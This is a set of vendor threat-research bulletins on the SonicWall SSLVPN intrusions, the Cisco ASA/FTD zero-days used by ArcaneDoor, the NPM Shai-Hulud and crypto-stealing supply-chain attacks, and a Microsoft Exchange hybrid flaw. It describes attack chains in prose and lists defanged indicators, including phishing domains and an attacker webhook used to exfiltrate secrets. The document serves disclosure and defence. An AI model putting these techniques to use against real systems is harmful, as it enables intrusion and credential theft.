disconnected shortly after logging in, while in others they conducted network scanning and local Window account access attempts, suggesting selective post-exploitation. (Huntress, 2025)SonicWall has since issued a new advisory confirming unauthorized access to cloud-stored firewall configuration backups via its MySonicWall platform, exposing encrypted credentials and configuration data. Although the credentials remain encrypted, SonicWall warns that access to these files increases the risk of targeted follow-on attacks (SonicWall, 2025). This expands on SonicWall’s September disclosure, which had initially limited the impact to under 5% of devices. No direct link has been confirmed between this breach and the current SSLVPN compromises, but given their overlap in timing and credential use, correlation cannot be ruled out.August 19, 2025The previously unattributed exploitation of SonicWall SSL VPNs between August-October 2024 has been linked to Akira ransomware operations. SonicWall determined with high confidence that the intrusions resulted from password reuse combined with CVE-2024-40766 exploitation, rather than a zero-day vulnerability as initially suspected. The campaign affected devices with locally-stored credentials during Gen 6 to Gen 7 migrations where passwords weren't reset, with threat actors maintaining their characteristic rapid deployment timeline of 1.5-10 hours from initial access to ransomware execution. This attribution aligns with Akira's established pattern of targeting weak authentication controls and exploiting known vulnerabilities in VPN infrastructure. (SonicWall, 2025)If you are a current client of Sonicwall please contact support@centripetal.ai.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.ResourcesSonicwall - Gen 7 SonicWall Firewalls – SSLVPN Recent Threat ActivityHuntress Threat Advisory - Active Exploitation of SonicWall VPNsArtic Wolf - Arctic Wolf Observes July 2025 Uptick in Akira Ransomware Activity Targeting SonicWall SSL VPNThe Hacker News - SonicWall Investigating Potential SSL VPN Zero-Day After 20+ Targeted Attacks ReportedHelp Net Security - SonicWall firewalls targeted in ransomware attacks, possibly via zero-dayGuidePoint Security - GRITREP: Observed Malicious Driver Use Associated with Akira SonicWall CampaignFieldEffect - Update: Akira ransomware group targets SonicWall VPN appliancesHuntress - Huntress Threat Advisory: Widespread SonicWall SSLVPN CompromiseSonicWall - MySonicWall Cloud Backup File Incident --- ### [Critical Zero-Day Vulnerabilities Identified in Cisco Adaptive Security Appliance and Firepower Threat Defense Software](https://www.centripetal.ai/threat-research/critical-zero-day-vulnerabilities-identified-in-cisco-adaptive-security-appliance-and-firepower-threat-defense-software) Published: 2025-10-03 Summary: Cisco has identified critical zero-day vulnerabilities in its Adaptive Security Appliance and Firepower Threat Defense software, allowing state-sponsored actors to execute code, install persistent… Cisco has issued an urgent warning about an active espionage campaign conducted by ArcaneDoor, a sophisticated state-sponsored threat actor. The group is exploiting two zero-day vulnerabilities, CVE-2025-20333 and CVE-2025-20362, in widely used Cisco ASA and FTD security appliances. These critical flaws allow the actor to execute code, install persistent malware, and exfiltrate sensitive data. By compromising these perimeter devices, ArcaneDoor can seize the "keys to the kingdom," gaining a powerful foothold into government and enterprise networks. A third vulnerability, CVE-2025-30363, has also been patched to prevent future exploitation. CVE-2025-20333Vulnerability Type (CWE)CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')CVSS ScoreBase Score: 9.9 - CriticalAttack Vector: Network (AV:N)Attack Complexity: Low (AC:L)Privileges Required: Low (PR:L)User Interaction: None (UI:N)Scope: Changed (S:C)Impact on CIA:Confidentiality: High (C:H)Integrity: High (I:H)Availability: High (A:H)CVE-2025-20362Vulnerability Type (CWE)CWE-862: Missing AuthorizationCVSS ScoreBase Score: 6.5 - MediumAttack Vector: Network (AV:N)Attack Complexity: Low (AC:L)Privileges Required: None (PR:N)User Interaction: None (UI:N)Scope: Unchanged (S:U)Impact on CIA:Confidentiality: Low (C:L)Integrity: Low (I:L)Availability: None (A:N)CVE-2025-20363Vulnerability Type (CWE)CWE-122: Heap-based Buffer OverflowCVSS ScoreBase Score: 9 - CriticalAttack Vector: Network (AV:N)Attack Complexity: High (AC:H)Privileges Required: None (PR:N)User Interaction: None (UI:N)Scope: Changed (S:C)Impact on CIA:Confidentiality: High (C:H)Integrity: High (I:H)Availability: High (A:H)Impacted VersionsProductSoftware Release TrainRecommended Fixed ReleaseStatus / NotesCisco ASA Software9.129.12.4.72Direct patch for impacted EoL versions.Cisco ASA Software9.149.14.4.28Direct patch for impacted EoL versions.Cisco ASA Software9.169.16.4.85Standard release patch.Cisco ASA Software9.17Not AvailableUpgrade to a newer, fixed release train.Cisco ASA Software9.189.18.4.67Standard release patch.Cisco ASA Software9.19Not AvailableUpgrade to a newer, fixed release train.Cisco ASA Software9.29.20.4.10Standard release patch.Cisco ASA Software9.229.22.2.14Standard release patch.Cisco ASA Software9.239.23.1.19Standard release patch.Cisco FTD Software77.0.8.1Standard release patch.Cisco FTD Software7.1Not AvailableUpgrade to a newer, fixed release train.Cisco FTD Software7.27.2.10.2Standard release patch.Cisco FTD Software7.3Not AvailableUpgrade to a newer, fixed release train.Cisco FTD Software7.47.4.2.4Standard release patch.Cisco FTD Software7.67.6.2.1Standard release patch.Cisco FTD Software7.77.7.10.1Standard release patch.The Attack ChainThe above diagram demonstrates the attack chain involving CVE-2025-20362 and CVE-2025-20333 as derived by Zscaler (2025). (Image: Zscaler, 2025)Reconnaissance and Initial AccessThe attack begins with broad reconnaissance, where attackers scan the internet for vulnerable Cisco ASA/FTD devices, specifically targeting those with exposed WebVPN or HTTPS interfaces. After identifying a target, often an older ASA 5500-X series model nearing its end-of-support, they gain initial access by exploiting an authentication bypass vulnerability (CVE-2025-20362). This allows them to circumvent the login process and access protected parts of the system.Exploitation and ExecutionOnce past the authentication step, the attackers chain the initial vulnerability with a second exploit (CVE-2025-20333) to achieve remote code execution. This allows them to deploy their primary payload, LINE VIPER, a modular malware system that runs directly in the device's memory. With LINE VIPER active, the attackers gain full control over the device's user-level processes.Persistence and Command & ControlTo ensure their access survives reboots and software updates, the attackers install RayInitiator, an advanced bootkit that modifies the device's GRUB bootloader. This firmware-level implant provides deep, persistent access. From there, the in-memory LINE VIPER malware establishes a covert command-and-control (C2) channel, communicating with the attackers using encrypted WebVPN sessions or ICMP tunnels.Espionage and Anti-ForensicsWith persistent control established, the attackers focus on their objective: espionage. Using LINE VIPER, they capture network traffic, exfiltrate device configurations, and create backdoor accounts. Throughout this phase, they employ aggressive anti-forensic techniques to remain undetected. This includes:Suppressing specific syslog IDs to hide their activity.Intercepting diagnostic CLI commands to return false "healthy" results.Intentionally crashing the device if a core dump or forensic analysis is initiated.The entire operation is designed for stealthy data extraction from the perimeter device itself, with no evidence of the attackers moving further into the internal network.Mitigation StrategiesIdentification and AssessmentDetermine Vulnerability Status First, identify your device model and software version. Cross-reference this information with Cisco's official security advisories to determine if your software release is affected.Assess Device Configuration The primary attack vector is through VPN web services. Check if IKEv2 with client services or any SSL VPN configurations are enabled on your device.If these services are not enabled, your device is not vulnerable to this specific campaign. However, Cisco still strongly recommends upgrading to a patched software release to protect against other threats.If these services are enabled, your device is vulnerable.RemediationYou have two options for remediation. Upgrading is the only permanent solution.Option 1: Upgrade to a Fixed Release (Recommended)This is the most effective, long-term solution.Upgrade Software Install a patched software release provided by Cisco to permanently resolve the vulnerabilities.Replace End-of-Life Devices If your device is vulnerable but has passed its end-of-life (EoL) or end-of-support date, migrate immediately to supported hardware and software.Option 2: Mitigate via Service Disablement (Temporary)This is a temporary workaround if you cannot immediately upgrade. It involves disabling the affected services, which will impact functionality.A. Disable IKEv2 Client Services This will prevent VPN clients from receiving software and profile updates from the device, but IKEv2 IPsec VPN functionality will be retained.For Cisco ASA Software (CLI): Bash# Identify interfaces with client services enabled firewall# show running-config crypto ikev2 | include client-servicesDisable client services on the identified interfacefirewall(config)# crypto ikev2 enable <interface_name>For FTD managed by FMC In the Remote Access VPN Policy, edit each crypto map and uncheck Enable Client Services.For FTD managed by FDM This platform does not support the vulnerable configuration.B. Disable All SSL VPN Services Important: All remote access SSL VPN features will cease to function after this action.**For Cisco ASA Software (CLI):**Bashfirewall(config)# no webvpnFor FTD managed by FMC In the Remote Access VPN Policy, edit the Access Interface tab and uncheck Enable SSL for each interface listed.For FTD managed by FDM In the Remote Access VPN configuration, delete all Connection Profiles.Recovery for Potentially Compromised DevicesIf you suspect or have confirmed a compromise, remediation alone is not enough. You must recover the device to a trusted state.Boot a Fixed Release to Remove Persistence For Cisco ASA 5500-X devices without Secure Boot, booting a patched software release will automatically scan for and remove the actor's persistence mechanism.If persistence is found and removed, a log file named firmware_update.log will be created on disk0:, and the device will reboot into a clean system. The presence of this file is a strong indicator of prior compromise.Rebuild the Device Configuration (Critical Step) A compromised device's configuration, including all passwords, certificates, and keys, must be considered untrusted.The only way to ensure the device is clean is to reset it to factory defaults after the software upgrade.Reconfigure the device from scratch with new local passwords, and re-generate all certificates and keys. Do not restore a backup of the old configuration.How to Reset to Factory Defaults:Cisco ASA Software Use the configure factory-default command. If not supported, use write erase followed by reload.Cisco FTD Software Follow Cisco's official documentation for a complete re-image of your specific hardware series (e.g., 1000/2100/3100 or 4100/9300).Cisco FTD Virtual The virtual appliance must be completely re-deployed from a fresh image.Threat ActorArcaneDoorIn April 2024, Cisco Talos released an article on the espionage campaign known as ArcaneDoor (Talos Intelligence, 2025), being conducted by the sophisticated state-sponsored threat actor UAT4356 or STORM-1849. this group has been observed to target Cisco ASAs in critical sectors previously by daisy chaining two zero-day vulnerabilities (CVE-2024-20353 and CVE-2024-20359) to deploy custom Lua-written malware. This included LineDancer, a memory-resident tool for network surveillance and configuration changes, and Line Runner, a persistent backdoor that cleverly used the device's boot process to maintain access. UAT4356 employed variety of advanced tricks to evade detection and remain persistence; employing anti-forensic measures, such as disabling logging and using hooking techniques to intercept system functions, effectively hiding their malicious activities.In the most recent wave of attempted exploitation, Cisco identified that ArcaneDoor (Cisco, 2025) had undergone a significant evolution in attack patterns and capabilities which were observed in two new malware variants used; RayInitiator and LINE VIPER. This new toolset targets older end-of-life Cisco ASA devices that lack secure boot. RayInitiator operates as a highly persistent bootkit, flashed directly to a device's firmware to survive reboots and upgrades. Once embedded, it deploys LINE VIPER, an advanced in-memory payload. Compared to its predecessors, LINE VIPER demonstrates a greater emphasis on operational security, featuring robust anti-forensic techniques to evade detection and using victim-specific RSA keys to encrypt its command-and-control communications.TimelineAugust 1, 2025 - Centripetal observes surges in reconnaissance activity from the IPsSeptember 25, 2025 - Cisco releases Security Advisories for ASA AND FTD software VPN Web server vulnerabilities CVE-2025-20333, CVE-2025-20362 and CVE-2025-30363. NIST also publishes details of CVEs. CISA issues Emergency Directive ED 25-03: Identify and Mitigate Potential Compromise of Cisco Devices.September 26, 2025 - Cisco publishes event response article: Continued Attacks Against Cisco Firewalls. Deadline for CISA ED 25-03 required actions.October 2, 2025 - Those in use of affected Cisco products deadline to report to CISA, including all utilized devices in scope and actions taken to mitigate vulnerabilities.TTPsFigure 2: ArcaneDoor’s MITRE ATT&CK Map (MITRE, 2025)Detection Guide (Cisco, 2025)Searching for Missing Logs Analyze syslog data for a sudden decrease or complete absence of specific message IDs, particularly "302013", "302014", "609002", and "710005", as their suppression in memory is a key indicator of compromise.Checking for Disabled Functions Verify system integrity by running the show checkheaps command several times over a five-minute period; if the "Total number of runs" counter does not increase, the function may be disabled by the actor.Identifying Suspicious Logins Monitor VPN authentication logs for "impossible travel" events, where a single user account connects from two geographically distant locations in a timeframe that would be physically impossible.Verifying Firmware After Upgrades After upgrading a Cisco ASA 5500-X series device, check for prior compromise by searching for a file named "firmware_update.log" on disk0: or by monitoring the console during boot for messages like "Bootloader verification failed" or "ROMMON verification failed".Centripetal’s PerspectiveCentripetal’s aggregated threat intelligence solution observed a ~86% coverage against the IPs observed to be conducting the extensive reconnaissance against these appliances (GreyNoise, 2025).Figure 3: ~86% coverage of the scanning IPs observedOur internal analysis showed that there was a surge in reconnaissance activity at the beginning of August from the identified IPs associated with this campaign across Centripetal’s Customer base.Figure 4: Centripetal’s Intelligence observing spike in activity at the start of AugustObserving Figure 4 with the activity observed by GreyNoise (Figure 5; GreyNoise, 2025) at the end of September would infer that the targeted scanning was being conducted in waves in advance.Figure 5: Greynoises’s observations of spike’s in scanning activityConclusionIn the wake of another wave of ArcaneDoor, it becomes clear that network edge devices remain to be a bullseye target for threat actors. The methodical exploitation of zero-day vulnerabilities, especially on aging hardware lacking modern protections like Secure Boot, highlights a persistent and calculated strategy to undermine the foundations of network security. Weeks before these vulnerabilities were disclosed, there were reports of massive, anomalous spikes in scanning activity targeting these devices similar to foreshocks before the earthquake - there can be clear indicators of a focused, reconnaissance effort.While zero-day exploits will always represent a formidable challenge, the future of defense cannot solely rely on a reactive posture of patching after a compromise is revealed. The continued security of our most critical infrastructure depends on our collective ability to fuse intelligence - to connect the dots between an actor's known preference for legacy hardware, observable scanning anomalies, and evolving malware tradecraft. These consolidated insights are the signals that can transform our defense from a frantic response into a proactive, intelligence-driven posture, allowing us to harden the most likely targets before they appear in the headlines.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Public Resourceshttps://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attackshttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUWhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-http-code-exec-WmfP3h3Ohttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUBhttps://nvd.nist.gov/vuln/detail/cve-2025-20333https://nvd.nist.gov/vuln/detail/CVE-2025-20363https://nvd.nist.gov/vuln/detail/cve-2025-20362https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-deviceshttps://unit42.paloaltonetworks.com/zero-day-vulnerabilities-affect-cisco-software/https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362https://www.securityweek.com/cisco-firewall-zero-days-exploited-in-china-linked-arcanedoor-attacks/https://www.greynoise.io/blog/scanning-surge-cisco-asa-deviceshttps://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/https://attack.mitre.org/campaigns/C0046/ --- ### [NPM Compromises Expose Critical Weakness in the Software Supply Chain](https://www.centripetal.ai/threat-research/npm-compromises-expose-critical-weakness-in-the-software-supply-chain) Published: 2025-09-24 Summary: In September 2025, two major NPM compromises exposed the fragility of the software supply chain—from phishing-driven credential theft to the wormable Shai-Hulud attack. This bulletin details how… In September of 2025, threat actors once again demonstrated the risk of supply chain attacks by targeting the Node Package Manager (NPM) ecosystem and exploiting the implicit trust developers place in open-source dependencies. Two separate incidents were observed: one involving credential abuse to publish malicious updates to legitimate packages, and another leveraging typosquatting and dependency confusion to deliver trojanized libraries. Both cases highlight the continued exploitation of the software supply chain to gain initial access, exfiltrate sensitive data, and compromise development environments.Crypto-Focused Supply Chain AttackThe cryptocurrency-focused attack on September 8, 2025, was first identified after Aikido’s intelligence feed flagged a cluster of malicious packages being pushed to NPM. Analysis revealed the intrusion began with a phishing email impersonating NPMJS support, sent to reputable maintainer Josh Junon (Qix). The lure prompted a fraudulent account security update, leading to stolen credentials and compromise of his NPM account.With this access, the attacker published multiple malicious package versions containing code designed to hook browser and wallet APIs. Once installed, the malware monitored transactions, replaced legitimate wallet addresses with attacker-controlled ones, and silently rerouted funds. Although the campaign lasted only a few hours before discovery, it demonstrated how quickly a targeted phishing attack against a single maintainer can escalate into a widespread supply chain compromise with direct financial impact on cryptocurrency users.Shai-Hulud Worm AttackThe escalation of NPM-focused campaigns continued on September 15, 2025, with the emergence of the Shai-Hulud worm, described by Arctic Wolf as “one of the first self-spreading worms to propagate via the npm ecosystem.” (Arctic Wolf, 2025) Attackers compromised more than 40 developer accounts and published over 700 malicious package versions to the NPM registry (SecurityWeek, 2025).Unlike prior incidents that relied solely on phishing or credential theft, Shai-Hulud demonstrated worm-like behavior. It spread automatically by leveraging compromised maintainer accounts to infect new packages and expand its reach across the ecosystem. The malicious packages contained obfuscated payloads designed to harvest developer credentials, exfiltrate environment variables, and implant persistence mechanisms within build pipelines.The scale and automation of this campaign underscore a dangerous shift in supply chain threats from targeted compromises to self-propagating malware capable of cascading rapidly across open-source ecosystems.The Attack ChainCrypto-Focused Supply-Chain AttackThe sophisticated malware attack chain is both stealthy and automated. It exploits human perception and technical vulnerabilities by compromising a trusted NPM package, then spreading silently across environments, infecting websites, and stealing funds without raising immediate suspicion.Figure 1. Cryptocurrency malware operation (Sourced from SOCRadar)Figure 1 depicts a simplified step by step view of the malware’s behavior, as outlined in an analysis conducted by SOC Radar (SOCRadar, 2025). The following stages were identified:Injection The malware injected hooks into browser APIs (fetch, XMLHttpRequest) and cryptocurrency wallet interfaces to intercept sensitive operations.Monitoring It inspected network responses and page payloads for cryptocurrency wallet addresses and transaction metadata.Manipulation When a valid wallet address was found, the code substituted it with an attacker-controlled lookalike.Hijacking Prior to transaction signing, the malware silently rerouted funds or approval flows to the attacker’s wallets.Stealth UI changes were suppressed so victims remained unaware of the manipulation.Shai-Hulud Worm AttackMultiple security researchers note that the attack structure described here resembles the techniques used by the same actors behind the Nx incident on 27 August 2025. The playbook mirrors that original intrusion but with a key change: the payload has been turned into a worm capable of harvesting secrets such as process.env, TruffleHog style scanning, and cloud metadata endpoints for AWS and GCP credentials, publishing those secrets to GitHub by creating a repo named Shai Hulud and committing JSON dumps, installing a GitHub Actions workflow that serializes toJSON(secrets) and exfiltrates them via an attacker webhook[.]site, and using discovered NPM tokens to enumerate and attempt updates to packages the compromised maintainer controls, finally iterating the victim’s accessible repositories to make them public or add workflows or branches that trigger further leaks. (Aikido, 2025).The diagram below illustrates the Shai Hulud worm’s attack chain:Figure 2. Shai-Hulud worm attack chainHarvest Scans the host and CI environment for secrets (process.env, TruffleHog-style scans, and cloud metadata endpoints) to collect credentials and tokens.Exfiltration (repo) Creates a GitHub repository (Shai-Hulud) under the compromised account and commits JSON dumps containing system info, environment variables, and harvested secrets.Exfiltration (Actions) Installs a malicious GitHub Actions workflow that serializes secrets (toJSON), POSTs them to an attacker webhook[.]site, and leaves encoded copies in the Actions logs.Propagation Uses discovered NPM tokens to enumerate and attempt updates of packages the victim maintains, leveraging the software supply chain to spread the compromise.Amplify Iterates the victim’s accessible repositories to make them public or add workflows/branches that trigger further runs and additional data leaks.Mitigation StrategiesCrypto-Focused Supply-Chain AttackThe crypto-focused attack lasted for only about two hours from the initial compromise to the deployment of malware in trusted dependencies. Anomaly alerts were triggered when server side errors emerged after repeated attempts by the malware to invoke the fetch() API in Node.js environments. These disruptions to integration workflows prompted early investigation by security teams. Post-discovery strategies have since been shared by multiple security researchers, and several have been compiled from various sources:Affected Crypto UsersDisconnect wallets from affected sites.Revoke token approvals before moving funds.Create a new wallet, back up the seed securely, and transfer assets.Monitor wallet activity for suspicious transactions.Developers / MaintainersAudit dependencies for compromised versions and reinstall from lockfiles.Rotate/revoke NPM access tokens and enforce MFA on maintainer accounts.Remove malicious scripts, pin dependency versions, and commit lockfiles.Limit publish permissions and review CI/CD credentials.Shai-Hulud Worm AttackThe Shai-Hulud worm operated rapidly once it gained a foothold in developer or CI environments. Within a short window, it scanned hosts and pipelines for secrets, committed harvested data into newly created repositories, and deployed malicious GitHub Actions workflows that exfiltrated credentials to attacker-controlled endpoints. Anomaly signals, such as unexpected repository creation, sudden workflow additions, or unusual outbound webhook activity from GitHub Actions prompted accelerated triage by security teams. Following discovery, recommendations from multiple incident responders and researchers were collected and consolidated.Affected Organizations / DevelopersRevoke and rotate exposed GitHub, NPM, and cloud tokens.Audit repos for unauthorized commits, new repos, or suspicious workflows.Review GitHub Actions logs for encoded payloads or unexpected outbound POSTs.Enforce MFA and least-privilege on all accounts.CI/CD Security TeamsDisable or quarantine untrusted workflows and block unknown webhooks.Require reviews and signed commits for workflow changes.Integrate secret-scanning and policy checks into CI.Regularly rotate and scope CI credentials.Package MaintainersAudit and re-publish clean package versions if tampered.Revoke/reissue registry tokens; enforce MFA.Limit publish permissions and require approvals.Pin dependencies and commit lockfiles.Downstream ConsumersValidate packages against lockfiles/checksums; pin to known-good versions.Monitor for anomalous version bumps or repo changes.Treat suspicious repos/logs as potential incident indicators.Share IOCs with platforms (GitHub/NPM) and peer organizations.TTPs & IOCsCrypto-Focused Supply-Chain AttackOver 18 NPM packages and versions with over 2 billion weekly downloads were compromised in a crypto-focused supply chain attack according to Sygnia (Sygnia, 2025). A comprehensive appendix containing details on affected versions, targeted wallets, and malware code characteristics is available here.Additionally, the following indicators of compromise (IOCs) were identified in the same analysis:Phishing infrastructurenpmjs[.]help185.7.81[.]108support@npmjs[.]helpstatic-mw-host.b-cdn[.]netimg-data-backup.b-cdn[.]netwebsocket-api2.publicvm[.]comhttps://www[.]npmjs[.]help/settings/qix/tfa/manageTfa?action=setup-totpShai-Hulud Worm AttackThe number of IOCs linked to this attack is extensive, reflecting the large volume of compromised packages. A complete list published by Reversing Labs (ReversingLabs, 2025). In addition, Checkmarx (Checkmarx, 2025) has highlighted the following IOCs as particularly important to monitor:Connections to “webhook[.]site“ with ID “bb8ca5f6-4175-45d2-b042-fc9ebb8170b7“File “bundle.js“ in a distribution with hash “46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09“Presence or loading of a GitHub Actions workflow named like “shai-hulud-workflow.yml“Presence of a repository branch “shai-hulud“Private GitHub repos suddenly becoming publicCentripetal’s PerspectiveAt Centripetal, we are aware of the significant risk phishing poses across cyber campaigns, and we continuously monitor for emerging phishing threats. These campaigns often serve as the initial gateway, enabling attackers to steal credentials or deliver malicious payloads that pave the way for broader compromise.The September NPM incidents illustrated this clearly; phishing led to the theft of maintainer credentials, which were then abused to push malicious updates to trusted packages. Detecting and disrupting phishing at an early stage remains one of the most effective ways to prevent downstream impacts such as package tampering, credential abuse, and widespread propagation. This part of the analysis will focus on the tactics, techniques, and procedures (TTPs) used in this initial stage of compromise.Phishing infrastructureAnalysis of the phishing infrastructure behind the cryptocurrency-focused attack observed several documented artifacts after the developer/maintainer, Josh Junon (Qix), publicly confirmed the compromise. One key domain - npmjs[.]help, was used to steal NPM credentials and served content that closely mimicked the legitimate npmjs domain. As shown in Figure 3, the fake domain was nearly indistinguishable from the authentic site, making it easy to confuse at a glance.Figure 3. Historical snapshot of npmjs[.]help captured on September 8th, 2025 ( Sourced from InternetArchive)Threat actors are known to impersonate reputable infrastructure providers such as Microsoft and Google in credential harvesting campaigns like Tycoon2FA and Salty2FA. These operations typically follow the same pattern: creating login pages that closely mimic legitimate services in order to intercept credentials in real time.As shown in Figures 4 and 5, taken from Any.Run’s latest analysis, these pages can appear legitimate at first glance. However, a closer look at the URL reveals that the domains are not owned by Google or Microsoft and are instead hosted on top-level domains (TLDs) that are uncommon for legitimate services.Figure 4. Malicious domain mimicking a Google login page (Sourced from AnyRun)Figure 5. Malicious domain mimicking a Microsoft login page ( Sourced from AnyRun)Domains and Hosting IPsPrevious analysis conducted by Security Alliance (SecurityAlliance, 2025) identified two additional domains that were not listed in any of the other public research tied to these attacks. Researchers were able to extract these indicators by examining data traces from npmjs[.]help, and attributed them to the same actor or to a phishing-as-a-service (PhaaS) infrastructure leveraged by similarly motivated threat groups.To reinforce attribution, researchers noted that:The domain registration timelines aligned closely with the other phishing infrastructure already documented (June–September 2025).Code artifacts such as obfuscated JavaScript and iframe injections mirrored those observed on npmjs[.]help and 2hy[.]xyz, strengthening the link to the same operator.The naming conventions and TLD selections suggested a deliberate effort to mimic trusted services while evading detection.These additions provide further evidence of a persistent and adaptive phishing campaign, one that not only recycles infrastructure but also extends its scope to target different verticals within the blockchain and developer ecosystems. It also highlights how less-visible domains may play supporting roles in staging or redirecting traffic before users are presented with a spoofed login page. (Figure 6)Figure 6. Relationship graph (Sourced from SecurityAlliance)It is indicative to say that based on the attack pattern and success, the threat actors behind these two attacks are not malware-focused but rather phishing-oriented operators. Their campaigns consistently relied on credential harvesting, domain impersonation, and malicious iframes, rather than the deployment of complex malware families. This reinforces the hypothesis that the group has limited malware development expertise and instead invests in phishing-as-a-service infrastructure to scale operations.Centripetal’s Threat Intelligence CoverageCentripetal’s aggregated threat intelligence covering this NPM-targeted campaign revealed 100% coverage during our internal analysis, with full inclusion of both IP addresses and domains associated with the attacks. While our threat intelligence primarily focuses on network indicators of compromise (IOCs), the value lies in its ability to disrupt the attack chain at the very earliest stages, before adversaries can advance further into the environment. (Figure 7)Figure 7. Centripetal’s CoverageThe September 2025 Node Package Manager compromises underscore the evolving nature of software supply chain threats, with attackers shifting from targeted phishing and credential abuse to large scale, worm like propagation across open source ecosystems. Both the crypto focused campaign and the Shai Hulud worm demonstrate how phishing remains the critical gateway for initial access, enabling credential theft and subsequent package tampering. Once access is gained, malicious code can propagate rapidly through trusted dependencies, amplifying the impact on developers and end users alike. These incidents highlight the urgent need for early detection of phishing activity, rigorous package integrity controls, and continuous monitoring of both developer accounts and build pipelines to reduce the risk of downstream compromise.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.ResourcesAikido - npm debug and chalk packages compromisedPaloAltoNetworks - Breakdown: Widespread npm Supply Chain Attack Puts Billions of Weekly Downloads at RiskSygnia - 16 Minutes to Impact: npm Supply Chain Abuse Deploys crypto-draining malwareSOCRadar - Massive npm Supply Chain Attack Exposes Millions to Crypto-Stealing MalwareReversingLabs - Crypto wallets targeted in widespread hack of npm, GitHubBleepingComputer - Hackers hijack npm packages with 2 billion weekly downloads in supply chain attackArticWolf - Wormable Malware Causing Supply Chain Compromise of npm Code PackagesSecurityWeek - Shai-Hulud Supply Chain Attack: Worm Used to Steal Secrets, 180+ NPM Packages HitAikido - S1ngularity/nx attackers strike againReversingLabs - Self-replicating Shai-hulud worm spreads token-stealing malware on npmCheckmarx - NPM Hit By Shai-Hulud, The Self-Replicating Supply Chain AttackSecurityAlliance - Following up on 'The Largest (Failed) Supply Chain Attack in History' --- ### [Microsoft Exchange Hybrid Vulnerability Exposes Path to 365 Compromise](https://www.centripetal.ai/threat-research/microsoft-exchange-hybrid-vulnerability-exposes-path-to-365-compromise) Published: 2025-08-28 Summary: A high-severity flaw, CVE-2025-53786, affects Microsoft Exchange Hybrid and enables attackers to escalate privileges in Microsoft 365 On August 6, 2025, Microsoft disclosed CVE-2025-53786, a high-severity privilege escalation vulnerability affecting Microsoft Exchange Server hybrid deployments (Microsoft, 2025). The vulnerability stems from the use of a shared service principal between on-premises Exchange servers and Exchange Online in hybrid configurations, which allows an attacker with administrative access to the on-prem server to potentially escalate privileges in the connected cloud environment without leaving easily detectable traces (Microsoft, 2025).Security researcher Dirk-Jan Mollema demonstrated at Black Hat USA 2025 how this vulnerability could be exploited to forge OAuth tokens that enable impersonation of any hybrid user within a Microsoft 365 tenant (The Hacker News, 2025). These forged tokens are valid for 24 hours, cannot be revoked, and may bypass logging in Microsoft Purview and M365 audit logs as the activity originates from a trusted on-prem Exchange source. Exploitation of this vulnerability could lead to total domain compromise in hybrid environments if left unpatched (CISA, 2025). No observed exploitation in the wild was noted by security stakeholders. However, Microsoft has rated exploitation as “more likely” based on its internal assessment (Microsoft, 2025).Vulnerability Type (CWE)CWE-287: Improper Authentication (Microsoft, 2025)CVSS ScoreBase Score: (High)Attack Vector: Network (AV:N)Attack Complexity: High (AC:H)Privileges Required: High (PR:H)User Interaction: None (UI:N)Scope: Change (S:C)Impact on CIA:Confidentiality: High (C:H)Integrity: High (I:H)Availability: High (A:H)Impacted VersionsProductUpdate / VersionKB ArticleBuild NumberExchange Server 2016CU23KB 505067415.01.2507.055Exchange Server 2019CU14KB 505067315.02.1544.025Exchange Server 2019CU15KB 505067215.02.1748.024Exchange Server Subscription EditionRTMKB 504715515.02.2562.017Microsoft has released security updates for several versions of Exchange Server to address the vulnerability. Administrators running Exchange Server 2016 (CU23), Exchange Server 2019 (CU14 and CU15), and the Exchange Server Subscription Edition (RTM) should apply the relevant update. It is important to note that for the Subscription Edition, while the required functionality is included, administrators must still manually perform the necessary configuration and credential cleanup steps to ensure full mitigation (Microsoft, 2025).Mitigation StepsInstall Security Updates Apply the April 2025 (or later) Exchange Server hotfix level and applicable security updates (Microsoft, 2025).Implement the New Hybrid Model Deploy the dedicated Exchange hybrid app to replace the shared service principal and complete the documented configuration (Microsoft, 2025; Help Net Security, 2025).Reset Shared Principal Credentials Clear the keyCredentialson the shared service principal. If hybrid/OAuth was previously configured but is no longer used (Microsoft, 2025).Reduce Legacy Exposure Disconnect public‑facing Exchange/SharePoint servers that are end-of-life (EOL) or unsupported from the Internet (CISA, 2025).Health Check & Hygiene Run the Microsoft Exchange Health Checker to verify compliance and determine if further steps are required (CISA, 2025).Plan for EWS Restrictions Microsoft will temporarily block EWS traffic using the shared principal to accelerate adoption; plan migration to the dedicated app and Graph (Gatlan, 2025; Help Net Security, 2025).Exploit ProcessPrerequisite Attacker already has admin rights on an on‑prem Exchange server (Microsoft, 2025).Abuse of shared identity The on‑prem server’s certificate credentials tied to the shared service principal are used to request S2S/OAuth actor tokens (The Hacker News, 2025).Impersonation window With trustedfordelegation present, forged tokens can impersonate hybrid users in Exchange Online (and potentially SharePoint) for up to 24 hours and cannot be revoked during that period; “These tokens, they’re basically valid for 24 hours. You cannot revoke them.” (Cybersecurity News, 2025).Low audit visibility Activity originating from trusted on‑prem Exchange may evade standard cloud audit trails (The Hacker News, 2025; Gatlan, 2025).TimelineApril 18, 2025 - Microsoft announces Exchange Server security changes for hybrid deployments and a non‑security hotfix, introducing the dedicated hybrid app model (Microsoft, 2025; Help Net Security, 2025).August 6, 2025 - Microsoft publishes CVE‑2025‑53786; CISA issues an alert urging swift action; no observed exploitation at disclosure 